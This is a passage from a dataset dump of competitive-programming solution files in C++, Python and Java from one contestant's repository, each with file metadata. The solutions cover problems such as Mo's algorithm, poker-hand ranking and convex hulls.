index, bool forward) {\n auto [i, 
from, to] = updates[index];\n if (!forward) to = from;\n if (L <= i && i <= R)\n del(i);\n a[i] = to;\n if (L <= i && i <= R)\n add(i);\n}\n\nint get(int x) {\n auto it = coords.find(x);\n if (it != coords.end())\n return it->second;\n int sz = coords.size();\n return coords[x] = sz;\n}\n\nvoid run()\n{\n cin >> n >> q;\n fori(n)\n {\n cin >> a[i];\n a[i] = get(a[i]);\n }\n\n fori(q)\n {\n int type, l, r;\n cin >> type >> l >> r; --l;\n if (type == 1)\n {\n --r;\n auto order = peanoOrder(l, r, B, 13);\n requests[A] = {B, l, r, A, order};\n ++A;\n }\n else\n {\n r = get(r);\n updates[B++] = {l, a[l], r};\n a[l] = r;\n }\n }\n for (int i = B - 1; i >= 0; --i)\n a[updates[i][0]] = updates[i][1];\n\n sort(requests, requests + A, [&](const auto& a, const auto& b) {\n return get<4>(a) < get<4>(b);\n });\n\n fori(A)\n {\n const auto& [t, l, r, id, _] = requests[i];\n while (T < t) update(T++, true);\n while (T > t) update(--T, false);\n while (R < r) add(++R);\n while (L > l) add(--L);\n while (R > r) del(R--);\n while (L < l) del(L++);\n for (int mex = 1; ; ++mex)\n if (diffsCNT[mex] == 0)\n {\n ans[id] = mex;\n break;\n }\n }\n fori(A)\n cout << ans[i] << \"\\n\";\n}\n\n//{{{\nint main()\n{\n cin.tie(0); ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.3177570104598999, "alphanum_fraction": 0.3448598086833954, "avg_line_length": 16.482759475708008, "blob_id": "32b46dd1d4d6af5e367b581e2847120aee50199a", "content_id": "17de8f249aec72783310e5ed491cf9e5eaec5066", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1070, "license_type": "no_license", "max_line_length": 45, "num_lines": 58, "path": "/trains/western2014/I.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdio>\r\n#include <iostream>\r\n#include <algorithm>\r\n#include 
<cmath>\r\n#include <ctime>\r\n\r\nusing namespace std;\r\n\r\nconst int MaxN = 1239;\r\n\r\n\r\nint a[MaxN][MaxN];\r\n\r\nint n, k;\r\nint main()\r\n{\r\n cin >> k >> n;\r\n if (!(k - 1)){\r\n int sum = 0, mx = -1, x;\r\n for (int i = 0; i < n; ++i){\r\n cin >> x;\r\n mx = max(mx, x);\r\n sum += x;\r\n }\r\n sum += mx;\r\n cout << sum;\r\n return 0;\r\n }\r\n\r\n\r\n int x;\r\n for (int i = 0; i < k; ++i)\r\n for (int j = 0; j < n; ++j)\r\n cin >> a[j][i];\r\n for (int i = 0; i < n; ++i)\r\n sort(a[i], a[i] + k);\r\n\r\n\r\n int maxi = -1, d = -1;\r\n for (int i = 0; i < n; ++i){\r\n int nxt = min (2 * a[i][0], a[i][1]);\r\n if (d < nxt - a[i][0]){\r\n maxi = i;\r\n d = nxt - a[i][0];\r\n }\r\n }\r\n a[maxi][0] *= 2;\r\n if (a[maxi][0] > a[maxi][1])\r\n swap (a[maxi][0], a[maxi][1]);\r\n int sum = 0;\r\n for (int i = 0; i < n; ++i){\r\n sum += a[i][0];\r\n }\r\n\r\n cout << sum;\r\n\r\n\r\n}" }, { "alpha_fraction": 0.4499843120574951, "alphanum_fraction": 0.4683286249637604, "avg_line_length": 28.665115356445312, "blob_id": "27126249242bbccc4570885c287ad91650452620", "content_id": "17be5b0f76ce085da405be09b7fb8db2fd76dae7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6378, "license_type": "no_license", "max_line_length": 173, "num_lines": 215, "path": "/2021/yandexBackendFinal/I.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nmap<char, int> m, v;\n\nstruct user\n{\n vector<pii> cards;\n string name;\n user(){}\n int combination = 0;\n vector<int> mxx;\n\n void add(string& s)\n {\n pii card = {0, m[s.back()]};\n if (s[0] != ' ')\n card.first = 10;\n else if (s[1] >= '2' && s[1] <= '9')\n card.first = s[1] - '0';\n else\n card.first = v[s[1]];\n cards.pb(card);\n }\n\n void calc()\n {\n\t\tint mx = 0;\n\t\tint mmx = 0;\n map<int, int> c;\n for (pii& p: cards)\n c[p.first]++,\n mx = max(mx, p.first);\n bool flash = true;\n bool street = true;\n vector<pii> sets;\n vector<pii> fours;\n vector<pii> pairs;\n for (auto& [k, v]: c)\n if (v == 4)\n fours.pb({k, v});\n else if (v == 3)\n sets.pb({k, v});\n else if (v == 2)\n pairs.pb({k, v});\n \n sort(all(cards));\n sort(all(pairs));\n fori1(5)\n flash &= cards[i - 1].second == cards[i].second,\n street &= cards[i - 1].first + 1 == cards[i].first;\n //fori(5)\n //cerr << \" \" << cards[i].first << \" \" << cards[i].second;\n //cerr << \"\\n\";\n if (flash && street) {\n combination = 0;\n\t\t\tmxx = {-mx};\n //cerr << \"FLASH\" << \" \" << mx << endl;\n }\n else if (fours.size()) {\n combination = 1;\n mx = fours[0].first;\n\t\t\tmxx = {-mx};\n //cerr << \"CARE\" << \" \" << mx << endl;\n }\n else if (sets.size() && pairs.size()) {\n combination = 2;\n mx = sets[0].first;\n\t\t\tmxx = {-mx};\n //cerr << \"FH\" << \" \" << mx << endl;\n }\n else if (flash) {\n combination = 3;\n\t\t\tROF(i, 4, 0)\n\t\t\t\tmxx.pb(-cards[i].first);\n //cerr << \"FLASH\" << \" \" << mx << endl;\n }\n else if (street) {\n combination = 4;\n\t\t\tmxx = {-mx};\n //cerr << \"STREET\" << \" \" << mx << endl;\n }\n else if (sets.size()) {\n combination = 5;\n mx = sets[0].first;\n\t\t\tmxx = {-mx};\n //cerr << \"SET\" << \" \" << mx << endl;\n }\n else if (pairs.size() == 2) {\n combination = 6;\n mx = 
pairs[1].first;\n\t\t\tmmx = pairs[0].first;\n\t\t\tmxx = {-mx, -mmx};\n //cerr << \"TWO PAIRS\" << \" \" << mx << endl;\n }\n else if (pairs.size() == 1) {\n combination = 7;\n mx = pairs[0].first;\n\t\t\tmxx = {-mx};\n //cerr << \"PAIR\" << \" \" << mx << endl;\n }\n else {\n combination = 8;\n\t\t\tmxx = {-mx};\n //cerr << \"KIKER\" << \" \" << mx << endl;\n }\n }\n\n bool operator<(const user& other) const\n {\n return tuple(combination, mxx, name) < tuple(other.combination, other.mxx, other.name);\n }\n};\n\nvector<string>split(string&s,string_view d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\n\nvoid run()\n{\n m['H'] = 1;\n m['D'] = 2;\n m['S'] = 3;\n m['C'] = 4;\n v['J'] = 11;\n v['Q'] = 12;\n v['K'] = 13;\n v['A'] = 14;\n string s;\n\n while (true)\n {\n vector<user> users;\n bool eof = false;\n getline(cin, s);\n getline(cin, s);\n vector<string> cards = split(s, \"|\");\n while (true)\n {\n getline(cin, s);\n eof = !getline(cin, s);\n if (eof || s == \"\")\n break;\n user u;\n vector<string> cur = split(s, \"|\");\n u.name = cur[1];\n while (u.name.back() == ' ') u.name.pop_back();\n fori(cur.size())\n if (cur[i] == \" 1 \")\n u.add(cards[i]);\n u.calc();\n users.pb(u);\n }\n\n sort(all(users));\n\n vector<string> winners;\n fori(users.size())\n if (users[i].combination == users[0].combination && users[i].mxx == users[0].mxx)\n winners.pb(users[i].name);\n writeln(winners);\n if (eof) break;\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto 
it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\" \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4813590347766876, "alphanum_fraction": 0.5122130513191223, "avg_line_length": 30.114286422729492, "blob_id": "b3ab5bb179d166d0f858efedf656987b1ee3067a", "content_id": "755d462d381798cb32715c159132562d43f81a28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5445, "license_type": "no_license", "max_line_length": 165, "num_lines": 175, "path": "/2016/RCC3Qual/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) 
(max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n//Igorjan\n\nint f(int i)\n{\n return (i / 2) * (i / 2 - 1) / 2;\n}\n\nvoid run()\n{\n ints(n, k);\n vector<pii> points = {{1000, 1000}, {1000, 2000}, {2000, 2000}, {2000, 1002}};\n vector<pii> dx = {{-2, 2}, {-2, -2}, {2, -2}, {2, 2}};\n vector<pii> ans;\n int i = 0;\n int j = 0;\n int pot = 0;\n for (; f(i) <= k; ++i)\n {\n j = i % 4;\n ans.pb(points[j]);\n points[j].first += dx[j].first;\n points[j].second += dx[j].second;\n pot += i >= 2 && i % 2 == 0;\n if (f(i) == k)\n break;\n }\n int need = k - f(i - 1);\n if (f(i) == k)\n need = 0;\n if (need)\n {\n if (j == 1) \n {\n if (need > pot / 2)\n 
ans.pb({points[2].first - (need - pot / 2) * 2 - 1, points[2].second});\n else\n ans.pb({ans.back().first + need * 2 + 1, points[2].second});\n }\n if (j == 3) \n {\n //writeln(\"lol\", need, pot / 2);\n if (need <= pot / 2)\n //writeln(\"lol\", points[3]),\n ans.pb({ans.back().first - need * 2 - 1, ans.back().second});\n else\n ans.pb({points[0].first + (need - pot / 2) * 2 + 1, points[0].second});\n }\n }\n vector<pii> ans2;\n vector<pii> dy = {{2, -2}, {2, 2}, {-2, 2}, {-2, -2}};\n vector<pii> points2;\n int mnx, mny, mxx, mxy;\n mnx = mny = mxx = mxy = 1000;\n for (auto www : ans)\n mnx = min(mnx, www.first),\n mxx = max(mxx, www.first),\n mny = min(mny, www.second),\n mxy = max(mxy, www.second);\n points2.pb({mxx + 2, mny});\n points2.pb({mxx + 2, mxy + 2});\n points2.pb({mnx - 2, mxy + 2});\n points2.pb({mnx - 2, mny - 2});\n for (int q = int(ans.size()) - 1, j = 0; q < n; q++, j++)\n ans2.pb(points2[j % 4]),\n points2[j % 4].first += dy[j % 4].first,\n points2[j % 4].second += dy[j % 4].second;\n reverse(whole(ans2));\n if (ans2.size())\n writeln(ans2);\n writeln(ans);\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n ints(t);\n fori(t)\n run();\n#ifndef ONLINE_JUDGE\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T 
a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.4608859419822693, "alphanum_fraction": 0.47596606612205505, "avg_line_length": 24.878047943115234, "blob_id": "d93fc9400c8a59a99732f4bce6848f9609bd9405", "content_id": "a2310f7d12dc6d92fddf68ca9140bf5132851fe9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1061, "license_type": "no_license", "max_line_length": 58, "num_lines": 41, "path": "/TopCoder/TC641/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 05 December 2014\n#include <bits/stdc++.h>\n\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n\n#define fst first\n#define cnd second\n#define pb push_back\n#define ll long long\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define vvi vector<vector<int> >\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n\nusing namespace std;\n\n#define method string shuffle(vector <int> a)\n\n#define classname ShufflingCardsDiv2\n\nclass classname\n{\n public :\n method\n {\n int n = a.size();\n vi x, y;\n fori(n)\n (i % 2 ? y : x).pb(a[i]);\n int c = n / 2;\n int N = (c + 1) / 2;\n int count = 0;\n fori(x.size())\n if (x[i] <= c)\n count++;\n return count == N ? 
\"Possible\" : \"Impossible\";\n }\n};\n" }, { "alpha_fraction": 0.521192729473114, "alphanum_fraction": 0.5399211645126343, "avg_line_length": 35.890907287597656, "blob_id": "de07a347f9088af39578f1ae177fb4f2ac4da6f5", "content_id": "eadad59d2a76866173eaf52cd6e7b4065b29be4c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4058, "license_type": "no_license", "max_line_length": 163, "num_lines": 110, "path": "/2018/gcj1b/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n \nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n \nvoid writeln(){cout<<\"\\n\";}ttti void print(T a);ttti void priws(T a);ttti void read(T& a);\nttta void readln(Args&... 
args){(read(args),...);}tthti void writeln(H h,T...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n\n//binSearch\n//x -> min, f(x) == true\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f, T eps)\n{\n T m;\n while (fabs(r - l) > eps)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? l : r;\n}\n//Igorjan\n//}}}\n///-------------------------------------------------------------------------------------------------------------------------------------\n\nint run()\n{\n ints(n);\n vector<pii> children(n);\n vector<int> curr(n);\n readln(children, curr);\n return -binSearch(-1000000000, 0, [&](int m) {\n vector<int> deleted(curr);\n\t\t//vector<bool> used(n, false);\n function<bool(int, int, int)> dfs = [&](int u, int count, int it)\n {\n if (it >= 10000) return false;\n //cerr << \"getting \" << count << \" of \" << (u + 1) << \"\\n\";\n //if (used[u] && deleted[u] == 0) return false;\n int temp = deleted[u];\n deleted[u] = max(0, temp - count);\n //used[u] = true;\n if (temp >= count) return true;\n return dfs(children[u].first - 1, count - temp, it + 1) && dfs(children[u].second - 1, count - temp, it + 1); \n };\n return dfs(0, -m, 0);\n }, 1);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t);\n fori(t)\n {\n cout << \"Case #\" << (i + 1) << \": \" << run();\n if (i != t - 1) cout << \"\\n\";\n }\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti 
ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.40732264518737793, "alphanum_fraction": 0.4118993282318115, "avg_line_length": 35.41666793823242, "blob_id": "efa483568081adafa5d2f92028e8a7cef6ada77b", "content_id": "2408cbab34cd1de7c30db765cfd6722e9a682323", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 437, "license_type": "no_license", "max_line_length": 99, "num_lines": 12, "path": "/CodeForce/0411/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n[a, b] = map(int, raw_input().split())\n[c, d] = map(int, raw_input().split())\n[A, B] = map(int, raw_input().split())\n[C, D] = map(int, raw_input().split())\nif (((a > max(B, D)) & (d > max(A, C))) | ((c > max(B, D)) & (b > max(A, C)))):\n print \"Team 1\"\nelse:\n if ((((A > b) & (D > c)) | ((C > b) & (B > c))) & (((A > d) & (D > a)) | ((C > d) & (B > a)))):\n print \"Team 2\"\n else:\n print \"Draw\"\n" }, { "alpha_fraction": 0.4159553647041321, "alphanum_fraction": 0.4215364456176758, "avg_line_length": 22.06818199157715, "blob_id": "01d71d20d3cdb5c9d0e455c40d36fc8f9f6021df", "content_id": "0d141de426e0eef2448305e5b6393cf2da107226", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3046, "license_type": "no_license", "max_line_length": 103, "num_lines": 132, "path": 
"/trains/neerc/neerc.ifmo.ru.train.2013.10.15/D.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\nimport java.io.*;\nimport java.util.*;\n\npublic class D {\n final static String task = \"auxiliary\";\n\n class Point {\n int x, y;\n\n Point(int x, int y) {\n this.x = x;\n this.y = y;\n\n }\n\n @Override\n public boolean equals(Object o) {\n Point p = (Point) o;\n return x == p.x && y == p.y;\n }\n\n @Override\n public int hashCode() {\n return x ^ y;\n }\n\n }\n\n ArrayList<Point> h = new ArrayList<Point>(4096);\n ArrayList<Point> points = new ArrayList<Point>(4096);\n\n void QH(Point a, Point b) {\n Point q = null;\n int max = 0;\n for (Point c : points) {\n int dist = (c.x - a.x) * (b.y - a.y) - (c.y - a.y) * (b.x - a.x);\n\n if (dist > max) {\n q = c;\n max = dist;\n }\n }\n if (q != null) {\n h.add(q);\n QH(a, q);\n QH(q, b);\n }\n }\n\n void run() {\n int n = nextInt();\n Set<Point> hs = new HashSet<Point>(n);\n for (int i = 0; i < n; i++) {\n hs.add(new Point(nextInt(), nextInt()));\n }\n\n for (Point p : hs) {\n points.add(p);\n }\n\n if (points.size() == 1) {\n out.println(0.0);\n return;\n }\n Point a = points.get(0);\n Point b = points.get(1);\n if (points.size() == 2) {\n out.println(Math.sqrt((double) ((b.x - a.x) * (b.x - a.x) + (b.y - a.y) * (b.y - a.y))));\n return;\n }\n\n for (Point p : points) {\n if (p.x < a.x) {\n a = p;\n }\n if (p.x > b.x) {\n b = p;\n }\n }\n h.add(a);\n h.add(b);\n QH(a, b);\n QH(b, a);\n\n double ans = 0;\n for (Point u : h) {\n for (Point v : h) {\n double d = Math.sqrt((double) ((v.x - u.x) * (v.x - u.x) + (v.y - u.y) * (v.y - u.y)));\n if (d > ans) {\n ans = d;\n }\n }\n }\n out.println(ans);\n\n }\n\n int nextInt() {\n return Integer.parseInt(next());\n }\n\n long nextLong() {\n return Long.parseLong(next());\n }\n\n String next() {\n while (stringTokenizer == null || !stringTokenizer.hasMoreTokens()) {\n stringTokenizer = new StringTokenizer(nextLine());\n }\n return stringTokenizer.nextToken();\n 
}\n\n String nextLine() {\n try {\n return bufferedReader.readLine();\n } catch (IOException err) {\n return null;\n }\n }\n\n static BufferedReader bufferedReader;\n static StringTokenizer stringTokenizer;\n static PrintWriter out;\n\n public static void main(String[] args) throws IOException {\n bufferedReader = new BufferedReader(new InputStreamReader(System.in));\n out = new PrintWriter(System.out);\n new D().run();\n out.close();\n bufferedReader.close();\n }\n}\n" }, { "alpha_fraction": 0.3578219413757324, "alphanum_fraction": 0.3906655013561249, "avg_line_length": 25.295454025268555, "blob_id": "9fefe55d71d680ae01f508d6bb19c19bc7dfcfa3", "content_id": "d5ca393ef6bf181ca8cb46d243bd7c7e36abe54d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1157, "license_type": "no_license", "max_line_length": 61, "num_lines": 44, "path": "/2018/deadline24/B/formatAns.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nimport re\n\nlines = []\n\ndef printAns():\n cc = 0\n for i in range(len(lines)):\n lines[i] = list(map(int, lines[i].split()))\n cc = max(cc, max(lines[i]) // 100)\n ans = [[(-1, -1) for j in range(100)] for i in range(cc)]\n for i in range(len(lines)):\n for j in range(len(lines[i])):\n if (lines[i][j] < 0):\n lines[i][j] *= -1\n pipe = lines[i][j] // 100 - 1\n index = lines[i][j] % 100\n ans[pipe][index] = (i, j)\n\n print(cc)\n for i in range(cc):\n sss = ''\n for j in range(len(ans[i])):\n if ans[i][j + 1] == (-1, -1):\n break\n if ans[i][j][0] + 1 == ans[i][j + 1][0]:\n sss += 'E'\n if ans[i][j][0] - 1 == ans[i][j + 1][0]:\n sss += 'W'\n if ans[i][j][1] + 1 == ans[i][j + 1][1]:\n sss += 'S'\n if ans[i][j][1] - 1 == ans[i][j + 1][1]:\n sss += 'N'\n print(sss)\n\n\nfor line in sys.stdin:\n if len(re.sub(r'\\s', '', line)) == 0:\n printAns()\n lines = []\n else:\n lines.append(line)\n\nprintAns()\n" }, { "alpha_fraction": 0.6320939064025879, "alphanum_fraction": 
0.6771036982536316, "avg_line_length": 21.227272033691406, "blob_id": "ac468f052c8ecabe95ca140188eb0b4a5c8bcb61", "content_id": "e6a4a64876260fddc4173b90f48da3e79ae7c63b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 511, "license_type": "no_license", "max_line_length": 90, "num_lines": 22, "path": "/trains/ai/cpp-cgdk/new/cpp-cgdk/MyStrategy.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include \"MyStrategy.h\"\r\n\r\n#define PI 3.14159265358979323846\r\n#define _USE_MATH_DEFINES\r\n\r\n#include <cmath>\r\n#include <cstdlib>\r\n\r\nusing namespace model;\r\nusing namespace std;\r\n\r\nvoid MyStrategy::move(const Car& self, const World& world, const Game& game, Move& move) {\r\n move.setEnginePower(1.0);\r\n move.setThrowProjectile(true);\r\n move.setSpillOil(true);\r\n\r\n if (world.getTick() > game.getInitialFreezeDurationTicks()) {\r\n move.setUseNitro(true);\r\n }\r\n}\r\n\r\nMyStrategy::MyStrategy() { }\r\n" }, { "alpha_fraction": 0.46581631898880005, "alphanum_fraction": 0.4770408272743225, "avg_line_length": 32.7931022644043, "blob_id": "e65fff054a9b526f532a22f095fcde1c4d381064", "content_id": "e6af812fa5bf0d42825186469d4345d4011ca785", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1960, "license_type": "no_license", "max_line_length": 928, "num_lines": 58, "path": "/CodeForce/0316/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <string>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a, c;\nvector<bool> b;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d 
